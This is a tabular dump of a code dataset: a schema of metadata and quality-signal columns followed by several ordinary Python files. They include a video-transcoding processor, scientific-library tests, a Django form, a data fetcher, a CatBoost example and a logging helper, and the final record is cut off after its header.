Each record has the following columns (name and type):

| Column | Type |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
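The statistic columns after `content` are plain functions of the file text. The exact definitions used to produce this dump are not documented here, but a minimal sketch of how a few of them could be recomputed from a record's `content` field (assuming straightforward definitions; the original pipeline's tokenization and edge-case handling may differ) looks like this:

```python
import re

def basic_signals(content: str) -> dict:
    """Recompute a few per-file statistics from the raw text of a record's `content`."""
    lines = content.splitlines()
    words = re.findall(r"\S+", content)  # whitespace-delimited tokens
    n_chars = max(len(content), 1)
    n_lines = max(len(lines), 1)
    return {
        # average and maximum line length, in characters
        "avg_line_length": sum(len(l) for l in lines) / n_lines,
        "max_line_length": max((len(l) for l in lines), default=0),
        # fraction of characters that are alphanumeric
        "alphanum_fraction": sum(c.isalnum() for c in content) / n_chars,
        # word count and uniqueness ratio
        "num_words": len(words),
        "frac_words_unique": len(set(words)) / max(len(words), 1),
        # rough Python-only proxy for the frac_lines_import signal
        "frac_lines_import": sum(l.lstrip().startswith(("import ", "from ")) for l in lines) / n_lines,
    }
```

Values computed this way should be in the same ballpark as the stored `avg_line_length`, `alphanum_fraction`, and `qsc_code_frac_words_unique_quality_signal` columns for the records below, but they are not guaranteed to match exactly, since the extraction code itself is not part of this dump.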
| hexsha | size | ext | lang |
|---|---|---|---|
| fe224e1ffb01067a1145784abb7281fb2243b190 | 1,788 | py | Python |

| field | max_stars | max_issues | max_forks |
|---|---|---|---|
| repo_path | smartfields/processors/video.py | smartfields/processors/video.py | smartfields/processors/video.py |
| repo_name | suhaibroomy/django-smartfields | suhaibroomy/django-smartfields | suhaibroomy/django-smartfields |
| repo_head_hexsha | e9331dc74f72d0254608526f8816aa4bb8f1fca4 | e9331dc74f72d0254608526f8816aa4bb8f1fca4 | e9331dc74f72d0254608526f8816aa4bb8f1fca4 |
| repo_licenses | ["MIT"] | ["MIT"] | ["MIT"] |
| count | null | null | null |
| event_min_datetime | null | null | null |
| event_max_datetime | null | null | null |

content:

```python
import re
import six
from smartfields.processors.base import ExternalFileProcessor
from smartfields.utils import ProcessingError

__all__ = [
    'FFMPEGProcessor'
]


class FFMPEGProcessor(ExternalFileProcessor):
    duration_re = re.compile(r'Duration: (?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)')
    progress_re = re.compile(r'time=(?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)')
    error_re = re.compile(r'Invalid data found when processing input')
    cmd_template = "ffmpeg -i {input} -y -codec:v {vcodec} -b:v {vbitrate} " \
                   "-maxrate {maxrate} -bufsize {bufsize} -vf " \
                   "scale={width}:{height} -threads {threads} -c:a {acodec} {output}"

    def stdout_handler(self, line, duration=None):
        if duration is None:
            duration_time = self.duration_re.search(line)
            if duration_time:
                duration = self.timedict_to_seconds(duration_time.groupdict())
        elif duration != 0:
            current_time = self.progress_re.search(line)
            if current_time:
                seconds = self.timedict_to_seconds(current_time.groupdict())
                progress = float(seconds)/duration
                progress = progress if progress < 1 else 0.99
                self.set_progress(progress)
            elif self.error_re.search(line):
                raise ProcessingError("Invalid video file or unknown video format.")
        return (duration,)

    def timedict_to_seconds(self, timedict):
        seconds = 0
        for key, t in six.iteritems(timedict):
            if key == 'seconds':
                seconds += int(t)
            elif key == 'minutes':
                seconds += int(t)*60
            elif key == 'hours':
                seconds += int(t)*3600
        return seconds
```

Quality signals (`avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`, in schema order): 39.733333 | 91 | 0.599553 | 207 | 1,788 | 5.057971 | 0.415459 | 0.007641 | 0.031519 | 0.034384 | 0.047755 | 0.047755 | 0.047755 | 0.047755 | 0.047755 | 0 | 0 | 0.009302 | 0.278523 | 1,788 | 44 | 92 | 40.636364 | 0.802326 | 0 | 0 | 0 | 0 | 0.076923 | 0.217562 | 0.068792 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051282 | false | 0 | 0.102564 | 0 | 0.333333 | 0

Raw `qsc_*` counterparts: all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective`: 1; `hits`: 0.
| hexsha | size | ext | lang |
|---|---|---|---|
| fe22b8aac4f7560fc1450a1ab43865faaf7aecdc | 2,192 | py | Python |

| field | max_stars | max_issues | max_forks |
|---|---|---|---|
| repo_path | tests/test_vmtkScripts/test_vmtksurfaceconnectivity.py | tests/test_vmtkScripts/test_vmtksurfaceconnectivity.py | tests/test_vmtkScripts/test_vmtksurfaceconnectivity.py |
| repo_name | ramtingh/vmtk | ramtingh/vmtk | ramtingh/vmtk |
| repo_head_hexsha | 4d6f58ce65d73628353ba2b110cbc29a2e7aa7b3 | 4d6f58ce65d73628353ba2b110cbc29a2e7aa7b3 | 4d6f58ce65d73628353ba2b110cbc29a2e7aa7b3 |
| repo_licenses | ["Apache-2.0"] | ["Apache-2.0"] | ["Apache-2.0"] |
| count | null | null | 1 |
| event_min_datetime | null | null | 2019-06-18T23:41:11.000Z |
| event_max_datetime | null | null | 2019-06-18T23:41:11.000Z |

content:

```python
## Program: VMTK
## Language: Python
## Date: January 12, 2018
## Version: 1.4
## Copyright (c) Richard Izzo, Luca Antiga, All rights reserved.
## See LICENSE file for details.
## This software is distributed WITHOUT ANY WARRANTY; without even
## the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
## PURPOSE. See the above copyright notices for more information.
## Note: this code was contributed by
## Richard Izzo (Github @rlizzo)
## University at Buffalo

import pytest
import vmtk.vmtksurfaceconnectivity as connectivity
import os


@pytest.fixture(scope='module')
def aorta_surface_two_segments(input_datadir):
    import vmtk.vmtksurfacereader as surfacereader
    reader = surfacereader.vmtkSurfaceReader()
    reader.InputFileName = os.path.join(input_datadir, 'aorta-surface-two-segments.vtp')
    reader.Execute()
    return reader.Surface


def test_extract_largest_surface(aorta_surface_two_segments, compare_surfaces):
    name = __name__ + '_test_extract_largest_surface.vtp'
    connectiv = connectivity.vmtkSurfaceConnectivity()
    connectiv.Surface = aorta_surface_two_segments
    connectiv.Method = 'largest'
    connectiv.CleanOutput = 1
    connectiv.Execute()
    assert compare_surfaces(connectiv.Surface, name) == True


def test_extract_closest_to_reference_surface(aorta_surface_two_segments, aorta_surface_reference, compare_surfaces):
    name = __name__ + '_test_extract_closest_to_reference_surface.vtp'
    connectiv = connectivity.vmtkSurfaceConnectivity()
    connectiv.Surface = aorta_surface_two_segments
    connectiv.Method = 'closest'
    connectiv.ReferenceSurface = aorta_surface_reference
    connectiv.Execute()
    assert compare_surfaces(connectiv.Surface, name) == True


def test_extract_closest_to_point(aorta_surface_two_segments, compare_surfaces):
    name = __name__ + '_test_extract_closest_to_point.vtp'
    connectiv = connectivity.vmtkSurfaceConnectivity()
    connectiv.Surface = aorta_surface_two_segments
    connectiv.Method = 'closest'
    connectiv.ClosestPoint = [0.0, 0.0, 0.0]
    connectiv.Execute()
    assert compare_surfaces(connectiv.Surface, name) == True
```

Quality signals (`avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`, in schema order): 35.354839 | 117 | 0.764599 | 253 | 2,192 | 6.339921 | 0.391304 | 0.074813 | 0.074813 | 0.114713 | 0.508105 | 0.479426 | 0.46384 | 0.46384 | 0.431421 | 0.393392 | 0 | 0.008108 | 0.156022 | 2,192 | 61 | 118 | 35.934426 | 0.858919 | 0.218978 | 0 | 0.411765 | 0 | 0 | 0.100771 | 0.084766 | 0 | 0 | 0 | 0 | 0.088235 | 1 | 0.117647 | false | 0 | 0.117647 | 0 | 0.264706 | 0

Raw `qsc_*` counterparts: all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective`: 1; `hits`: 0.
| hexsha | size | ext | lang |
|---|---|---|---|
| fe23546882c9babc55f9bce0abdfba0776ff09c5 | 653 | py | Python |

| field | max_stars | max_issues | max_forks |
|---|---|---|---|
| repo_path | sssoon/forms.py | sssoon/forms.py | sssoon/forms.py |
| repo_name | Kingpin-Apps/django-sssoon | KINGH242/django-sssoon | Kingpin-Apps/django-sssoon |
| repo_head_hexsha | 2a44d0d19e70dcd3127f9425c0ed4ba52355a1d2 | 2a44d0d19e70dcd3127f9425c0ed4ba52355a1d2 | 2a44d0d19e70dcd3127f9425c0ed4ba52355a1d2 |
| repo_licenses | ["BSD-3-Clause"] | ["BSD-3-Clause"] | ["BSD-3-Clause"] |
| count | 2 | 2 | null |
| event_min_datetime | 2018-04-20T08:28:10.000Z | 2018-05-16T13:45:14.000Z | null |
| event_max_datetime | 2018-05-04T15:32:30.000Z | 2020-07-29T22:01:37.000Z | null |

content:

```python
from django import forms
from nocaptcha_recaptcha.fields import NoReCaptchaField


class NewsletterForm(forms.Form):
    email = forms.EmailField(label='Email', required=True,
                             widget=forms.TextInput(attrs={
                                 'id': 'newsletter-email',
                                 'type': 'email',
                                 'title': 'Email',
                                 'name': 'email',
                                 'class': 'form-control transparent',
                                 'placeholder': 'jane.doe@example.com'
                             }))
    captcha = NoReCaptchaField()
```

Quality signals (`avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`, in schema order): 40.8125 | 70 | 0.444104 | 45 | 653 | 6.422222 | 0.711111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.456355 | 653 | 16 | 71 | 40.8125 | 0.814085 | 0 | 0 | 0 | 0 | 0 | 0.169725 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0

Raw `qsc_*` counterparts: all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective`: 1; `hits`: 0.
| hexsha | size | ext | lang |
|---|---|---|---|
| fe242c827a7e391a419864c9504b7e2daf4968d1 | 1,054 | py | Python |

| field | max_stars | max_issues | max_forks |
|---|---|---|---|
| repo_path | simple_run_menu.py | simple_run_menu.py | simple_run_menu.py |
| repo_name | william01110111/simple_run_menu | william01110111/simple_run_menu | william01110111/simple_run_menu |
| repo_head_hexsha | 804c6bb8d6c63c3a4d4c6d3377601bd44fb0eeea | 804c6bb8d6c63c3a4d4c6d3377601bd44fb0eeea | 804c6bb8d6c63c3a4d4c6d3377601bd44fb0eeea |
| repo_licenses | ["MIT"] | ["MIT"] | ["MIT"] |
| count | null | null | null |
| event_min_datetime | null | null | null |
| event_max_datetime | null | null | null |

content:

```python
#! /bin/python3
# simple run menu

import os
import stat


def is_file_executable(path):
    executable = stat.S_IEXEC | stat.S_IXGRP | stat.S_IXOTH
    if not os.path.isfile(path):
        return False
    st = os.stat(path)
    mode = st.st_mode
    if not mode & executable:
        return False
    return True


def get_files_in_dir(directory):
    if directory == '':
        directory = '.'
    if directory[-1] != '/':
        directory += '/'
    return [directory + i for i in os.listdir(directory)]


def command_to_name(command):
    filename_with_ext = os.path.basename(command)
    filename = filename_with_ext.rsplit('.', 1)[0]
    name = filename.replace('_', ' ')
    capitalized = ' '.join([i[0].upper() + i[1:] for i in name.split()])
    return capitalized


class Option:
    options = {}

    @staticmethod
    def add(command):
        options['a'] = Option(command, command, 'a')

    def __init__(self, name, command, trigger):
        self.name = name
        self.command = command
        self.trigger = trigger


if __name__ == "__main__":
    print([command_to_name(i) for i in get_files_in_dir('') if is_file_executable(i)])
```

Quality signals (`avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`, in schema order): 22.425532 | 83 | 0.685009 | 154 | 1,054 | 4.461039 | 0.383117 | 0.021834 | 0.026201 | 0.037846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006849 | 0.16888 | 1,054 | 46 | 84 | 22.913043 | 0.777397 | 0.028463 | 0 | 0.058824 | 0 | 0 | 0.016634 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.147059 | false | 0 | 0.058824 | 0 | 0.411765 | 0.029412

Raw `qsc_*` counterparts: all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective`: 1; `hits`: 0.
| hexsha | size | ext | lang |
|---|---|---|---|
| fe2476b1a28089e744d395040c690305385ddcb6 | 1,792 | py | Python |

| field | max_stars | max_issues | max_forks |
|---|---|---|---|
| repo_path | mne/io/cnt/tests/test_cnt.py | mne/io/cnt/tests/test_cnt.py | mne/io/cnt/tests/test_cnt.py |
| repo_name | stevemats/mne-python | LiFeng-SECUC/mne-python | LiFeng-SECUC/mne-python |
| repo_head_hexsha | 47051833f21bb372d60afc3adbf4305648ac7f69 | 732bb1f994e64e41a8e95dcc10dc98c22cac95c0 | 732bb1f994e64e41a8e95dcc10dc98c22cac95c0 |
| repo_licenses | ["BSD-3-Clause"] | ["BSD-3-Clause"] | ["BSD-3-Clause"] |
| count | 1,953 | 8,490 | 1,130 |
| event_min_datetime | 2015-01-17T20:33:46.000Z | 2015-01-01T13:04:18.000Z | 2015-01-08T22:39:27.000Z |
| event_max_datetime | 2022-03-30T04:36:34.000Z | 2022-03-31T23:02:08.000Z | 2022-03-30T21:44:26.000Z |

content:

```python
# Author: Jaakko Leppakangas <jaeilepp@student.jyu.fi>
#         Joan Massich <mailsik@gmail.com>
#
# License: BSD-3-Clause

import os.path as op

import numpy as np
from numpy.testing import assert_array_equal
import pytest

from mne import pick_types
from mne.datasets import testing
from mne.io.tests.test_raw import _test_raw_reader
from mne.io.cnt import read_raw_cnt
from mne.annotations import read_annotations

data_path = testing.data_path(download=False)
fname = op.join(data_path, 'CNT', 'scan41_short.cnt')


@testing.requires_testing_data
def test_data():
    """Test reading raw cnt files."""
    with pytest.warns(RuntimeWarning, match='number of bytes'):
        raw = _test_raw_reader(read_raw_cnt, input_fname=fname,
                               eog='auto', misc=['NA1', 'LEFT_EAR'])
    # make sure we use annotations event if we synthesized stim
    assert len(raw.annotations) == 6
    eog_chs = pick_types(raw.info, eog=True, exclude=[])
    assert len(eog_chs) == 2  # test eog='auto'
    assert raw.info['bads'] == ['LEFT_EAR', 'VEOGR']  # test bads
    # the data has "05/10/200 17:35:31" so it is set to None
    assert raw.info['meas_date'] is None


@testing.requires_testing_data
def test_compare_events_and_annotations():
    """Test comparing annotations and events."""
    with pytest.warns(RuntimeWarning, match='Could not parse meas date'):
        raw = read_raw_cnt(fname)
    events = np.array([[333, 0, 7],
                       [1010, 0, 7],
                       [1664, 0, 109],
                       [2324, 0, 7],
                       [2984, 0, 109]])
    annot = read_annotations(fname)
    assert len(annot) == 6
    assert_array_equal(annot.onset[:-1], events[:, 0] / raw.info['sfreq'])
    assert 'STI 014' not in raw.info['ch_names']
```

Quality signals (`avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`, in schema order): 32 | 74 | 0.65346 | 259 | 1,792 | 4.362934 | 0.474903 | 0.030973 | 0.026549 | 0.046018 | 0.118584 | 0.058407 | 0 | 0 | 0 | 0 | 0 | 0.041817 | 0.226004 | 1,792 | 55 | 75 | 32.581818 | 0.772891 | 0.179688 | 0 | 0.058824 | 0 | 0 | 0.082702 | 0 | 0 | 0 | 0 | 0 | 0.235294 | 1 | 0.058824 | false | 0 | 0.264706 | 0 | 0.323529 | 0

Raw `qsc_*` counterparts: all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective`: 1; `hits`: 0.
| hexsha | size | ext | lang |
|---|---|---|---|
| fe24a27fb5e1b1af1324c59e811661bad02c4101 | 792 | py | Python |

| field | max_stars | max_issues | max_forks |
|---|---|---|---|
| repo_path | parliament_proposal_fetcher.py | parliament_proposal_fetcher.py | parliament_proposal_fetcher.py |
| repo_name | Track-your-parliament/track-your-parliament-data | Track-your-parliament/track-your-parliament-data | Track-your-parliament/track-your-parliament-data |
| repo_head_hexsha | 1ab9d9fe5cf4921e4cc792d0e3db3263557daafd | 1ab9d9fe5cf4921e4cc792d0e3db3263557daafd | 1ab9d9fe5cf4921e4cc792d0e3db3263557daafd |
| repo_licenses | ["MIT"] | ["MIT"] | ["MIT"] |
| count | null | null | null |
| event_min_datetime | null | null | null |
| event_max_datetime | null | null | null |

content:

```python
import urllib.request, json
import pandas as pd

baseUrl = 'https://avoindata.eduskunta.fi/api/v1/tables/VaskiData'
parameters = 'rows?columnName=Eduskuntatunnus&columnValue=LA%25&perPage=100'

page = 0
df = ''
while True:
    print(f'Fetching page number {page}')
    with urllib.request.urlopen(f'{baseUrl}/{parameters}&page={page}') as url:
        data = json.loads(url.read().decode())
        if page == 0:
            columns = data['columnNames']
            df = pd.DataFrame(columns=columns)
        dataRows = data['rowData']
        df = df.append(pd.DataFrame(dataRows, columns=data['columnNames']), ignore_index=True)
        if data['hasMore'] == False:
            break
    page = page + 1

df.to_csv('./data/parliament_proposals_raw.csv', sep=';', encoding='utf-8')
```

Quality signals (`avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`, in schema order): 29.333333 | 94 | 0.641414 | 100 | 792 | 5.04 | 0.63 | 0.051587 | 0.087302 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015873 | 0.204545 | 792 | 27 | 95 | 29.333333 | 0.784127 | 0 | 0 | 0 | 0 | 0 | 0.319042 | 0.163934 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.105263 | 0.052632

Raw `qsc_*` counterparts: all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective`: 1; `hits`: 0.
| hexsha | size | ext | lang |
|---|---|---|---|
| fe2717913fd1b6cb1c949e299c54e281bc41335e | 2,899 | py | Python |

| field | max_stars | max_issues | max_forks |
|---|---|---|---|
| repo_path | examples/Catboost_regression-scorer_usage.py | examples/Catboost_regression-scorer_usage.py | examples/Catboost_regression-scorer_usage.py |
| repo_name | emaldonadocruz/UTuning | emaldonadocruz/UTuning | emaldonadocruz/UTuning |
| repo_head_hexsha | b32207bcbeb80e4c07e098bcbe4d5ce8b3fee778 | b32207bcbeb80e4c07e098bcbe4d5ce8b3fee778 | b32207bcbeb80e4c07e098bcbe4d5ce8b3fee778 |
| repo_licenses | ["BSD-3-Clause"] | ["BSD-3-Clause"] | ["BSD-3-Clause"] |
| count | null | null | null |
| event_min_datetime | null | null | null |
| event_max_datetime | null | null | null |

content:

```python
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 20 16:15:37 2021

@author: em42363
"""
# In[1]: Import functions
'''
CatBoost is a high-performance open source library for gradient boosting
on decision trees
'''
from catboost import CatBoostRegressor
from sklearn.model_selection import train_test_split
import pandas as pd
import seaborn as sns
import numpy as np
import os
os.chdir(os.path.dirname(__file__))
import sys
sys.path.insert(0, r'C:\Users\eduar\OneDrive\PhD\UTuning')
sys.path.insert(0, r'C:\Users\em42363\OneDrive\PhD\UTuning')
from UTuning import scorer, plots

#df = pd.read_csv(r'C:\Users\eduar\OneDrive\PhD\UTuning\dataset\unconv_MV.csv')
df = pd.read_csv(r'C:\Users\em42363\OneDrive\PhD\UTuning\dataset\unconv_MV.csv')

import random
import matplotlib.pyplot as plt

# In[1]: Split train test
'''
Perform split train test
'''
y = df['Production'].values
X = df[['Por', 'LogPerm', 'Brittle', 'TOC']].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33)

# In[6]: Regressor
'''
Define the regressor, fit the model and predict the estimates
'''
model = CatBoostRegressor(iterations=1000, learning_rate=0.2, loss_function='RMSEWithUncertainty',
                          verbose=False, random_seed=0)
model.fit(X_train, y_train)
estimates = model.predict(X_test)

# In[9]: Plot error line
'''
Use UTuning to plot error lines
'''
plots.error_line(estimates[:, 0], y_test, np.sqrt(estimates[:, 1]), Frac=1)

# %% Define the virtual ensemble
def virt_ensemble(X_train, y_train, num_samples=100, iters=1000, lr=0.1):  # 100, .1
    ens_preds = []
    model = CatBoostRegressor(iterations=iters, learning_rate=lr, loss_function='RMSEWithUncertainty',
                              verbose=False, random_seed=1)
    model.fit(X_train, y_train)
    ens_preds = model.virtual_ensembles_predict(X_test, prediction_type='VirtEnsembles',
                                                virtual_ensembles_count=num_samples,
                                                thread_count=8)
    return np.asarray(ens_preds)

# %%
n_quantiles = 11
perc = np.linspace(0.0, 1.00, n_quantiles)
Samples = 10

ens_preds = virt_ensemble(X_train, y_train, num_samples=Samples)

Pred_array = ens_preds[:, :, 0]
Knowledge_u = np.sqrt(np.var(Pred_array, axis=1))  # Knowledge uncertainty
Data_u = np.sqrt(np.mean(ens_preds[:, :, 1], axis=1))  # Data uncertainty
Sigma = Knowledge_u + Data_u

# %%
'''
We use UTuning to return the Indicator Function and plot the
accuracy plot and diagnose our model.
'''
scorer = scorer.scorer(Pred_array, y_test, Sigma)
IF_array = scorer.IndicatorFunction()
avgIF = np.mean(IF_array, axis=0)

# % Second plot test
plots.error_accuracy_plot(perc, IF_array, Pred_array, y_test, Sigma)

# %
print('Accuracy = {0:2.2f}'.format(scorer.Accuracy()))
print('Precision = {0:2.2f}'.format(scorer.Precision()))
print('Goodness = {0:2.2f}'.format(scorer.Goodness()))
```

Quality signals (`avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`, in schema order): 26.354545 | 102 | 0.703001 | 434 | 2,899 | 4.534562 | 0.373272 | 0.02439 | 0.014228 | 0.02439 | 0.259146 | 0.215447 | 0.195122 | 0.034553 | 0 | 0 | 0 | 0.034994 | 0.162125 | 2,899 | 109 | 103 | 26.59633 | 0.775216 | 0.119007 | 0 | 0.043478 | 0 | 0 | 0.123344 | 0.059845 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021739 | false | 0 | 0.217391 | 0 | 0.26087 | 0.065217

Raw `qsc_*` counterparts: all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective`: 1; `hits`: 0.
| hexsha | size | ext | lang |
|---|---|---|---|
| fe27a69a39058bf33d488a199887b8c07ffdf22c | 1,683 | py | Python |

| field | max_stars | max_issues | max_forks |
|---|---|---|---|
| repo_path | sujson/_logger.py | sujson/_logger.py | sujson/_logger.py |
| repo_name | PotasnikM/translator-to-suJSON | PotasnikM/translator-to-suJSON | PotasnikM/translator-to-suJSON |
| repo_head_hexsha | abb2001c78d431bd2087754666bc896ba0543dfd | abb2001c78d431bd2087754666bc896ba0543dfd | abb2001c78d431bd2087754666bc896ba0543dfd |
| repo_licenses | ["MIT"] | ["MIT"] | ["MIT"] |
| count | 2 | 17 | 3 |
| event_min_datetime | 2019-07-01T12:45:25.000Z | 2019-04-25T10:46:40.000Z | 2019-06-22T19:51:08.000Z |
| event_max_datetime | 2020-06-23T11:48:08.000Z | 2020-11-10T09:28:55.000Z | 2021-02-08T09:17:55.000Z |

content:

```python
import logging
from platform import system
from tqdm import tqdm
from multiprocessing import Lock

loggers = {}


# https://stackoverflow.com/questions/38543506/
class TqdmLoggingHandler(logging.Handler):
    def __init__(self, level=logging.NOTSET):
        super(TqdmLoggingHandler, self).__init__(level)

    def emit(self, record):
        try:
            msg = self.format(record)
            tqdm.set_lock(Lock())
            tqdm.write(msg)
            self.flush()
        except (KeyboardInterrupt, SystemExit):
            raise
        except:
            self.handleError(record)


def setup_custom_logger(name):
    """
    Create a logger with a certain name and level
    """
    global loggers

    if loggers.get(name):
        return loggers.get(name)

    formatter = logging.Formatter(
        fmt='%(levelname)s: %(message)s'
    )

    handler = TqdmLoggingHandler()
    handler.setFormatter(formatter)

    if system() not in ['Windows', 'cli']:
        logging.addLevelName(logging.ERROR, "\033[1;31m%s\033[1;0m" % logging.getLevelName(logging.ERROR))
        logging.addLevelName(logging.WARNING, "\033[1;33m%s\033[1;0m" % logging.getLevelName(logging.WARNING))
        logging.addLevelName(logging.INFO, "\033[1;34m%s\033[1;0m" % logging.getLevelName(logging.INFO))
        logging.addLevelName(logging.DEBUG, "\033[1;35m%s\033[1;0m" % logging.getLevelName(logging.DEBUG))

    logger = logging.getLogger(name)
    logger.setLevel(logging.WARNING)

    # if (logger.hasHandlers()):
    #     logger.handlers.clear()
    if logger.handlers:
        logger.handlers = []

    logger.addHandler(handler)
    loggers.update(dict(name=logger))

    return logger
```

Quality signals (`avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`, in schema order): 29.017241 | 110 | 0.655971 | 193 | 1,683 | 5.663212 | 0.414508 | 0.029277 | 0.095151 | 0.025618 | 0.120769 | 0.120769 | 0.120769 | 0 | 0 | 0 | 0 | 0.039514 | 0.218063 | 1,683 | 57 | 111 | 29.526316 | 0.791033 | 0.087344 | 0 | 0 | 0 | 0 | 0.079051 | 0.055336 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.102564 | 0 | 0.25641 | 0

Raw `qsc_*` counterparts: all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective`: 1; `hits`: 0.
| hexsha | size | ext | lang |
|---|---|---|---|
| fe27abc65b6073ec58be633f81761077a129a312 | 1,243 | py | Python |

| field | max_stars | max_issues | max_forks |
|---|---|---|---|
